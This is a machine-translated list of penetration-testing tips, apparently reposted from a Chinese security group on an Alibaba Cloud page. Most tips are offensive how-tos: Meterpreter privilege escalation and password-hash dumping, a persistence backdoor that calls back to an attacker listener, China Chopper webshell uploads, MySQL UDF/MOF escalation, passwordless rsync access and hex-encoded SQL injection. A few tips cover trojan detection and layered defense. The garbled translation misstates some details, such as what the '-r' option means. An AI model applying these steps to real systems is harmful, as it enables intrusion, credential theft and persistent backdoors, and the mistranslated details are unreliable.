[Penetration note _ guangwai Security Group] (SI)

Source: Internet
Author: User

Our new topic: [Study Notes] aims to share the learning experience of our colleagues. The reverse notes are serialized by Alibaba Cloud's 91ri Network Security Research Office, these tips are mainly short but excellent penetration tips. These tips are some of the tips accumulated by small editors during reading and learning, and are initially set to be updated once a week. To ensure quality, each article contains about 20 pieces of penetration notes. Other students are welcome to share your notes with us ~ 1. In Webshell, if an object is missing during file upload. You can try to write a sentence and upload the file with the kitchen knife after connecting it with the kitchen knife. 2. Use the hashdump of meterpreter to extract the hash value of the windows Password:

Meterpreter> getuid // get current permission level meterpreter> getsystem // escalate permission meterpreter> run hashdump


3. The website http://www.md5decrypter.co.uk/can decrypt the ntlm/lm hash value online (Editor's note: This website has a high hit rate of MD5 cracking ). 3. Use meterpreter to create a backdoor:
The meterpreter> run persistence-A-S-U-I 60-p 4321-r parameter is used to automatically start the listener on the attacker's machine. The-S parameter indicates that the backdoor program is loaded when the Windows system is started. -U parameter indicates that the backdoor is automatically executed when the user logs on to the system. -I parameter is used to set the time interval between backdoor connection and proxy Handler-p is the port number-r is the IP address of the target machine


4. The idea of in-depth network defense: as a company, it will hire a patrol Engineer (the first layer) for the physical line and implement port security (the second layer) on the switch of the Working Group ), create an access list (Layer 3) on the VBR, set up the DMZ zone and packet filtering (Layer 4) in the firewall, and set IDS/IDP monitoring/blocking (Layer 3 to Layer 7 ), establish an SSL channel (layer 6), set content filtering (Layer 7), provide AAA service (Layer 7), perform vulnerability scanning (Layer 4 to Layer 7), and virus scanning (Layer 7). -- Taken from IT security interview strategy 5. IPS devices can provide attack detection and defense functions. If they are connected using an image, a response mechanism is used. If they are connected using a serial method, use the blocking mechanism. 6. Obtain the name of the Peer Computer Based on the ip Address: ping-a ip address, for example, ping-a 7. In the system "windows" folder, click to open "system. ini file. If the Code contains [boot] Code, the format of the shell statement is generally "shell = file name ", if a file name (such as shell = file name + file name) is followed by a trojan program. 8. In the system "windows" folder, click to open the "win. ini" file. If the Code contains "run = ?" Or "load = ?" Code type. Pay attention to the subsequent files. Generally, there is no content after "run =" and "load =". If there is a path or an unfamiliar file name, it may be a Trojan program. 9. There are many ways to hide Trojans. Generally, they are hidden in the hkey_current_usersoftwaremicrosoftwindowscur1_versionrun of the Registry.
Directory. Check whether there are any unfamiliar executable files in the key value. Such files may be Trojans. 10. Web sniffer for webpage capturing-aifei web detective: aifei web detective is an HTTP network sniffer that captures and analyzes packets containing HTTP in the LAN, find the HTTP Communication content that meets the filter. 11. Common windows XP system vulnerabilities: RDP vulnerability, remote plaintext account name transfer vulnerability, UPnP buffer overflow vulnerability, hotkey vulnerability, DoS Vulnerability 12, and common windows 7 system vulnerabilities: vulnerabilities in kernel drivers, vulnerabilities in auxiliary drivers, accumulated Security Update vulnerabilities in IE, and vulnerabilities in color control panel ,.. NET, Silverlight, and SharePoint vulnerabilities. 13. Magic attack method for clearing BIOS passwords: If you can enter the system, you can use BiosPwds, CmosPwd, and other software to clear it. (Editor note: Don't think about it.) 14. Physical attack method for clearing BIOS passwords: Turn off the power and pick out the correct patch caps on the motherboard With professional tools, from the original logo as "1", "2" pin foot cover marked as "2", "3" on the pin, then restore the patch cap, turn on the power, the BIOS password is cleared. If you encounter an old machine, but remove the battery, and then use a conductive tool to remove the password. 15. When the mysql database has the permission to read and write files, the conditions for successful file writing must be unescaped in single quotes, and the existing file cannot be overwritten. The last statement must be used. Therefore, magic_quotes_gpc must be 0ff. 16. During the penetration elevation process, you can try UDF to escalate permissions when you know the mysql database connection account and password, provided that the system must be windows. Of course, if you have high permissions, you can use mof to write permissions to the system. 17. If the rsync service is enabled for the target during penetration, the default port is port 873. You can try to log on without a password. If you have insufficient permissions, you can directly upload files and view files on the target site. 18. If lcx does not work during port forwarding, try the reduh tool, but the speed is a little urgent! (In fact, that speed will make you have the impulse to smash the keyboard) 19. There are two injection methods in Digital Injection without single quotes, one is to define the injection string as a hexadecimal value variable @ r, and then execute exec (@ r); the other is to use the char () function and the "+" number. This article is for study notes, written by 91ri.org team

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.